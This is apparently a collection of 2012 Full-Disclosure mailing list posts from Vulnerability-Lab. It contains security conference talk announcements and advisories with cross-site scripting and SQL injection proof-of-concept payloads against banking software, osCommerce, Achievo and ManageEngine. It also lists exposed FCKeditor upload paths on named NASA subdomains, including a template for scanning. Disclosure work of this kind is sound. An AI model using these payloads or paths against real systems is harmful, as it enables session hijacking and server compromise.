Title: == HITB2011KUL - Post Memory Corruption Analysis Date: = 2012-01-26 References: === Download: http://www.vulnerability-lab.com/resources/videos/398.wmv View: http://www.youtube.com/watch?v=kOgarD9KCbg VL-ID: = 398 Status: Published Exploitation-Technique: === Conference Severity: = High Details: In this presentation, we introduce a new exploitation methodology of invalid memory reads and writes, based on dataflow analysis after a memory corruption bug has occured inside a running process. We will expose a methodology which shall help with writing a reliable exploit out of a PoC triggering an invalid memory write, in presence of security defense mechanism such as compiler enhancements (full RELRO, SSP) or kernel anti exploitation features (ASLR, NX). In particular, we will demonstrate how to: - Find all the function pointers inside a running process - How to determine which ones would have been dereferenced after the crash - Which ones are truncable (in particular with 0×). If case all of the above fail, how to test for specific locations overwrites in order to indirectly trigger a second vulnerability allowing greater control and eventually control flow hijacking. All of the above without source code, indeed ;) In the case of invalid memory reads, we will exemplify how to indirectly influence the control flow of execution by reading arbitrary values, how to trace all the unaligned memory access and how to test if an invalid read can be turned into an invalid write or used to infer the mapping of the binary. We will also introduce a new debugging technique which allows for very effective testing of all of the above by forcing the debugged process to fork(). Automatically. And with a rating of the best read/write location based on probabilities of mapping addresses (because of ASLR). Credits: Jonathan is a security research engineer holding an Engineering degree and a Master in Artificial Intelligence. Born in France, he’s been living in Brazil and India, before currently working in Australia. With about 15 years of practice of assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption bugs. He has been credited for the discovery of complex vulnerabilities in cryptographic software (eg: Microsoft Bitlocker, Truecrypt, and most BIOS software of the market including HP, Intel or Toshiba ones most notably), mainstream software (Opera web browser, adobe reader, top tiers antivirus softwares) and Virtualization software. He is currently working as Senior Security Consultant and CEO at the Toucan System security company (http://www.toucan-system.com). His clients count some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the co-organiser of the Hackito Ergo Sum conference (HES2011) in France. Jonathan has been a speaker at a number of great intenational conferences including Blackhat, Defcon, HITB (Amsterdam Kuala Lumpur), Ruxcon (Australia), Hackito Ergo Sum (France), and is a recurrent speaker at H2HC (Brazil Mexico). Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB2011KUL - Mobile Malware Analysis
Title: == HITB2011KUL - Mobile Malware Analysis Date: = 2012-02-06 References: === Download: http://www.vulnerability-lab.com/resources/videos/424.wmv View: http://www.youtube.com/watch?v=nVAuZ7jf7Sk VL-ID: = 424 Status: Published Exploitation-Technique: === Conference Severity: = High Details: Mobile malware is becoming a larger concern every day, as the proliferation of smartphones continues and more and more in-the-wild malicious applications appear. Unfortunately, many people charged with malware analysis and/or network defense lack the tools or the know-how to analyze malicious binaries on anything but a standard Windows/x86 environment – and thus mobile malware remains shrouded in mystery, with inadequate response compared to traditional desktop-based malware. This presentation aims to combat that problem. I’ll explain the process of setting up a virtual machine capable of running and analyzing Android applications (chosen as the mobile platform most likely to see new malware), and then step through analysis of live samples collected from the wild. The analysis will focus primarily on network behavior that can be used to detect infected devices – something whose usefulness is not limited to cell phone carriers, given the number of mobile devices that communicate over local Wi-Fi networks. Credits: Alex Kirk is a senior member of the Sourcefire VRT, and has been involved in vulnerability analysis and detection since starting there in 2004. He currently runs the VRT’s malware zoo, which has produced over 1TB worth of packet capture data by running live samples from the ClamAV virus database. He is the author of a pair of Snort-related chapters in the 2009 book “Practical Intrusion Analysis: Prevention and Detection for the Twenty-First Century,” is a regular contributor to the VRT blog (http://vrt-blog.snort.org/), and routinely speaks at security conferences around the world on IDS-related topics. Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB2011KUL - Chip PIN - Protocol Analysis EMV POS
Title: == HITB2011KUL - Chip PIN - Protocol Analysis EMV POS Date: = 2012-01-26 References: === Download: http://www.vulnerability-lab.com/resources/videos/399.wmv View: http://www.youtube.com/watch?v=5zFlqMFWYhc VL-ID: = 399 Status: Published Exploitation-Technique: === Conference Severity: = Medium Details: The EMV global standard for electronic payments is widely used for inter-operation between chip equipped credit/debit cards, Point of Sales devices and ATMs. Following the trail of the serious vulnerabilities published by Murdoch and Drimer’s team at Cambridge University regarding the usage of stolen cards, we explore the feasibility of skimming and cloning in the context of POS usage. We will analyze in detail EMV flaws in PIN protection and illustrate skimming prototypes that can be covertly used to harvest credit card information as well as PIN numbers regardless the type/configuration of the card. Our updated research also explores in depth the design, implementation and effectiveness of tamper proof sensors in modern and widely used POS terminals, illustrating different techniques for bypass and physical compromise. As usual cool gear and videos are going to be featured in order to maximize the presentation. Credits: Andrea Barisani Andrea Barisani is a security researcher and consultant. His professional career began 10 years ago but all really started when a Commodore-64 first arrived in his home when he was 10. Now, 18 years later, Andrea is having fun with large-scale IDS/Firewalls deployment and administration, forensic analysis, vulnerability assessment, penetration testing, security training and his Open Source projects. He eventually found that system and security administration are the only effective way to express his need for paranoia. Being an active member of the international Open Source and security community he’s maintainer/author of the tenshi, ftester projects as well as the founder and project coordinator of the oCERT effort, the Open Source Computer Emergency Reponse Team. He has been involved in the Gentoo project, being a member of the Gentoo Security and Infrastructure Teams, and the Open Source Security Testing Methodology Manual, becoming an ISECOM Core Team member. Outside the community he has been a security consultant for Italian firms and he’s now the co-founder and Chief Security Engineer of Inverse Path Ltd. He has been a speaker and trainer at PacSec, CanSecWest, BlackHat and DefCon conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, LDAP and other pretty things. Daniele Bianco He began his professional career during his early years at university as system administrator and IT consultant for several scientific organizations. His interest for centralized management and software integration in Open Source environments has focused his work on design and development of suitable RD infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At the time being he is the resident Hardware Hacker for international consultancy Inverse Path where his research work focuses on embedded systems security, electronic devices protection and tamperproofing techniques. He presented at many IT security events and his works have been quoted by numerous popular media. Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB2011KUL - Is The Pen Still Mightier Than The Sword
Title: == HITB2011KUL - Is The Pen Still Mightier Than The Sword Date: = 2012-01-18 References: === Download: http://www.vulnerability-lab.com/resources/videos/385.wmv View: http://www.youtube.com/watch?v=9dsYY_Zl4sk VL-ID: = 385 Status: Published Exploitation-Technique: === Conference Severity: = Medium Details: Presentation Title Is the Pen Still Mightier Than the Sword? Presentation Abstract In ancient Greece, Euripides warned that the tongue was sharper than the blade. In the Internet era, does the adage hold true? Julian Assange might agree, but what about the unknown author of Stuxnet? Access to information is nice, but the audience must have electricity to download and display the data. In this presentation, Dr. Geers will compare and contrast the national security implications of Wikileaks -- the new pen, and Stuxnet -- the new sword. Credits: Kenneth Geers, PhD, CISSP, is the U.S. Naval Criminal Investigative Service (NCIS) Cyber Subject Matter Expert. Mr. Geers was the first U.S. Representative to the NATO Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia. Mr Geers has served as an intelligence analyst, a French and Russian linguist, and computer programmer in support of arms control initiatives. Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NexorONE Online Banking - Multiple Cross Site Vulnerabilities
Title: == NexorONE Online Banking - Multiple Cross Site Vulnerabilities Date: = 2012-02-04 References: === http://www.vulnerability-lab.com/get_content.php?id=304 VL-ID: = 304 Introduction: = NexorONE is the leading online banking software provider for Private International banks, Offshore Financian Institutions, Savings and Loans, Credit unions, Investmenet Fund Managers and Payement Processing Companies. NexorONE has already been demployed to more than 200 financial entities worldwide, spread out throught 20 countries and in 12 different languages. with this market experience we know we can fulfill your business demands. (Copy of the Vendor Homepage: https://www.nexorone.com/ ) Abstract: = Vulnerability-Lab Team (Chokri B.A.) discovered multiple non-persistent Cross Site Scripting vulnerabilities on the NexorONE Online Banking Software. Report-Timeline: 2011-10-05: Vendor Notification 1 2011-11-13: Vendor Notification 2 2011-12-17: Vendor Notification 3 2012-02-04: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: A non-persistent cross site scripting vulnerability is detected on the NexorONE Online Banking Software. Successful exploitation of the vulnerability allows an attacker to hijack user/mod/admin sessions of the portal. Vulnerable file(s): [+] login.php Vulnerable Param(s): [+] ?visitor_language= [+] ?message= Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with required user inter action. For demonstration or reproduce ... PoC 1: div class=login_line2_QUESTION_NEW_CUSTOMER a href=register.php?visitor_language=english\ img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png tabindex=4_REGISTER/a =[x] /div/form PoC 2: div class=login_line2_QUESTION_NEW_CUSTOMER a href=register.php?visitor_language=english\\\ iframe src=http://www.vulnerability-lab.com onload=alert(vulnerabilitylab) height=800px width=900px =[x] tabindex=4_REGISTER/a/div/form PoC 3: div id=login table cellspacing=0 class=messagetrtdcenterRegistration_successful iframe src=http://www.vulnerability-lab.com onload=\alert(vulnerabilitylab);\ height=\800px\ width=\900px\ =[x] /center/td/tr/table Risk: = The security risk of the non-reflective cross site scripting vulnerabilities are estimated as medium. Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster the White) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OSCommerce v3.0.2 - Persistent Cross Site Vulnerability
Title: == OSCommerce v3.0.2 - Persistent Cross Site Vulnerability Date: = 2012-02-02 VL-ID: = 407 Introduction: = osCommerce is the leading Open Source online shop e-commerce solution that is available for free under the GNU General Public License. It features a rich set of out-of-the-box online shopping cart functionality that allows store owners to setup, run, and maintain their online stores with minimum effort and with no costs, license fees, or limitations involved. The goal of the osCommerce project is to continually evolve by attracting a community that supports the ongoing development of the project at its core level and extensively through contributions to provide additional functionality to the already existing rich feature set. Everything you need to get started in selling physical and digital goods over the internet, from the Catalog frontend that is presented to your customers, to the Administration Tool backend that completely handles your products, customers, orders, and online store data. (Copy of the Vendor Homepage: http://www.opensourcecms.com/scripts/details.php?scriptid=94name=osCommerce) Abstract: = Vulnerability-Lab Team (F0x) discovered a persistent Cross Site Scripting Vulnerability on the OSCommerce Shop Software. Report-Timeline: 2012-02-02: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistant cross site vulnerabilities are detected on the OSCommerce v3.0.2. The bug allows remote attacker to implement malicious script code on the application side. Successful exploitation of the vulnerability allows an attacker to manipulate specific modules can lead to session hijacking (user/mod/admin). Vulnerable Module(s): [+]index.php?Cart Proof of Concept: = The vulnerability can be exploited by local low privileged user account with required medium user inter action. For demonstration or reproduce ... PoC: 'img src=vul onerror=alert('vulnerabilitylab') in the front field of the shirt module. Output: Size: Mediumbr/- Front: 'img src=vul onerror=alert('vulnerabilitylab') Risk: = The security risk of the persistent vulnerability is estimated as medium. Credits: Vulnerability Research Laboratory - Alexander Fuchs (F0x23) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Achievo v1.4.3 - Multiple Web Vulnerabilities
Title: == Achievo v1.4.3 - Multiple Web Vulnerabilities Date: = 2012-01-30 References: === http://www.vulnerability-lab.com/get_content.php?id=403 VL-ID: = 403 Introduction: = Achievo is a flexible web-based resource management tool for business environments. Achievo s resource management capabilities will enable organisations to support their business processes in a simple, but effective manner. A solution that fits seamlessly to the wishes of every organisation and offers the possibility and freedom to adapt the functionality to the needs of the organisation. It will fit into every organisation because Achievo is extremly easy to change to your specific situation. (Copy of the Vendor Website: http://www.achievo.nl/product/ ) Abstract: = Vulnerability-Lab Team (Chokri B.A.) discovered Multiple Web Vulnerabilities on the resource management tool Achievo v1.4.3. Report-Timeline: 2012-01-30: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple persistant cross site a blind SQL vulnerabilities are detected on the resource management tool Achievo v1.4.3. The bug allows remote attacker to implement malicious script code on the application side and/or to execute sql commands via remote sql injection attack.. Successful exploitation of the vulnerability allows an attacker to manipulate specific modules can lead to session hijacking (user/mod/admin) and/or to compromise the application dbms. Vulnerable Module(s): [+] Users preferences [+] Projects [+] Download vcard ( SQLi ) Picture(s): ../1.jpg ../2.jpg Proof of Concept: = The vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ... 1. select class=atkManyToOneRelation name=atksearch_AE_coordinator_AE_coordinator[]option value=Search all /optionoption value=__NONE__Nothing selected/optionoption value=1 img src=image.jpg onerror=alert(123); / [X] , test (manager)/optionoption value=2 2. td valign=top class=fieldlabelbProject:/b /td td valign=top class=field img src: img src=image.jpg onerror=alert(1234); /[X] /td/tr 3. http://www.achievo.nl/demos/achievo/stable/dispatch.php?atkaction=vcardatklevel=1atkprevlevel=0atkstackid=4f2467eae0518id=3' Critical: Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1). Halted error: [+0.19090s / 0.00036s] Unknown error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'contact') ORDER BY person.role, person.lastname' at line 1) Halted... Risk: = 1.1 The security risk of the persistant xss vulnerabilities are estimated as medium(+). 1.2 The security risk of the blind sql injection vulnerabilities are estimated as high(+). Credits: Vulnerability Research Laboratory - Chokri B.A (Me!ster) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NASA Subdomains FCKEditor - Multiple Vulnerabilities
Title: == NASA Subdomains FCKEditor - Multiple Vulnerabilities Date: = 2012-01-29 References: === http://vulnerability-lab.com/get_content.php?id=400 VL-ID: = 400 Introduction: = The National Aeronautics and Space Administration (NASA) is the agency of the United States government that is responsible for the nation`s civilian space program and for aeronautics and aerospace research. Since February 2006, NASA`s mission statement has been to `pioneer the future in space exploration, scientific discovery and aeronautics research.`` On September 14, 2011, NASA announced that it had selected the design of a new Space Launch System that it said would take the agency s astronauts farther into space than ever before and provide the cornerstone for future human space exploration efforts by the U.S. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/NASA http://www.nasa.gov/news/reports/index.html) Abstract: = A Vulnerability Lab Researcher discovered multiple critical vulnerabilities on a NASA CMS Application. Report-Timeline: 2012-01-28: Vendor Notification 2012-02-01: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple remote File Upload vulnerabilities Misconfiguration Read Bugs are detected on the official NASA CMS Subdomains. The Vulnerability allows to read the config can result in malicious file uploads. Successful exploitation can result in dbms- application compromise. The bugs are located in the available FCKeditor version multiple nasa subdomains are vulnerable. Attacker can for example scan for fckeditor bugs exploit them via automatic routine. The method allows to manipulate multiple nasa subdomains. Vulnerable Module(s): [+] FCKeditor Proof of Concept: = The vulnerabilities can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: science.gsfc.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html smarts.nasa.gov/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html Note: You can use the Patch Name Like : CFIDE Reference(s): [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/browser.html [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/fckeditor.original.html [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmupload.html [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmcreatefolder.html[sqli] [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/config.cfm [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm [TarGeT].nasa.gov/[patch]/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/connector.cfm Risk: = The security risk of the multiple vulnerabilities are estimated as high(+). Credits: K0242[l3lack...@yahoo.com or l3lackhat...@gmail.com] - Houseofhackers.com Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eBank IT Online Banking - Multiple Web Vulnerabilities
Title: == eBank IT Online Banking - Multiple Web Vulnerabilities Date: = 2012-01-26 References: === http://www.vulnerability-lab.com/get_content.php?id=313 VL-ID: = 313 Introduction: = As a leading provider of innovative online banking software solutions, eBank-IT! provides an accessible venue for offering a full-valued online banking platform to your clients, using a cross-browser interface that`s secure and free of complexities and considering maximum privacy and data protection procedures, as well as a wide scope of contenual functionalities, which exceed the standard scope of most major online banking systems in the world. (Copy of the Vendor Website: http://www.ebank-it.com/ ) Abstract: = Vulnerability-Lab Team (Chokri B.A.) discovered multiple refelctive web vulnerability on the Online Banking Software eBank-IT. Report-Timeline: 2011-11-08: Vendor Notification 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2012-01-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple refelctive cross site vulnerabilities are detected on the online banking software eBank-IT. The bug allows remote attacker to implement malicious script code on the application side. Successful exploitation of the vulnerability allows an attacker to manipulate specific modules can lead to session hijacking (user/mod/admin). Vulnerable Module(s): [+] login [+] requestpw Pictures: ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ... tr td width=7% img src=images2/icons/error.gif/td td width=94% class=cal_font\img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png / /td /tr tr td colspan=3 align=center\img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png / /td /tr Risk: = The security risk of the reflective xss vulnerabilities are estimated as medium. Credits: Vulnerability Research Laboratory - Chokri B.A (Me!ster) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ME Monitoring Manager v9.x; v10.x - Multiple Vulnerabilities
Title: == ME Monitoring Manager v9.x; v10.x - Multiple Vulnerabilities Date: = 2012-01-27 References: === http://www.vulnerability-lab.com/get_content.php?id=115 VL-ID: = 115 Introduction: = Mit dem ManageEngine Applications Manager können IT-Administratoren von Unternehmen und Datenzentrumsgruppen die Leistung ihrer heterogenen Applikationen von einer einzigen Web-Konsole aus überwachen, bei Problemen Alarme empfangen, Fehler suchen bzw. diagnostizieren, Tendenzen analysieren und Kapazitäten mit Hilfe umfassender Reports planen. Um den verschiedenen Ansprüchen aller Administratoren gerecht zu werden, unterstützt der Applications Manager wichtige Produkte. Diese sind in drei Kategorien aufgeteilt: Die Funktionalität „Application Server Monitoring“ bietet detailierte Informationen zu häufig verwendeter Software, wie z.B. Java/J2EE, Microsoft .NET, Oracle Application Server und Tomcat. Von diesen Diensten hängen wiederum viele Anwendungen ab, so dass die Sicherung der Stabilität dieser Application Server essentiell ist. Auf der Seite der Datenbanken werden Protokolle und administrative Informationen zu gängige Produkten, wie Oracle Datenbanken, MySQL und DB2 abgefragt und können direkt nach Abfrage Benachrichtigungen auslösen. Dies hilft einzuschreiten, bevor kritische Zustände erreicht werden. Schlussendlich vervollständigt „System Management“ die drei Kategorien, da neben den Applikationen und Datenbanken auch die Schicht darunter, die Betriebssysteme vom Applications Manager überwacht werden. Dabei spielt es keine Rolle, ob Sie zum Beispiel Microsoft Windows, diverse Linux Distributionen oder Mac OS verwenden. (Copy of the Vendor Homepage: http://www.manageengine.com/) Abstract: = Vulnerability-Lab Team discovered multiple Vulnerabilities on Application Monitoring Manager by ManageEngine. Report-Timeline: 2011-08-01: Vendor Notification 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2012-01-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 Multiple non-persistent input validation vulnerabilities are detected (client-side). Attackers can hijack customer/admin sessions via cross site scripting. Vulnerable Module(s): [+] ThresholdActionConfiguration [+] PopUp_Graph [+] Showresource Picture(s): ../1.png ../2.png ../3.png 1.2 Multiple SQl Injection vulnerabilities are detected on the alert module the ?periods parameter request. Vulnerable Param(s): [+] ?periods --- SQL Error Logs --- Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1 ; nested exception is: java.sql.SQLException: Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1 Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1 ; nested exception is: java.sql.SQLException: Syntax error or access violation message from server: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near root at line 1 Picture(s): ../4.png ../5.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... 1.1 Path: /jsp/ File: ThresholdActionConfiguration.jsp Para: ?resourceid=1579attributeIDs=1902attributeToSelect=1902redirectto= Path: ../jsp/ File: PopUp_Graph.jsp Para: ?restype=QueryMonitormonID=1499resids=10003726baseid=1011attids=1113listsize=1attName= Path: ../ File: showresource.do Para: showresource.do?method=showResourceTypesnetwork= References: http://xxx.com/Search.do?query=%3E%22%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%3Cdiv+style%3D%221domain=all http://xxx.com/jsp/ThresholdActionConfiguration.jsp?resourceid=1579attributeIDs=1902attributeToSelect=1902 redirectto=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221
[Full-disclosure] FAA US Academy (AFS) - Auth Bypass Vulnerability
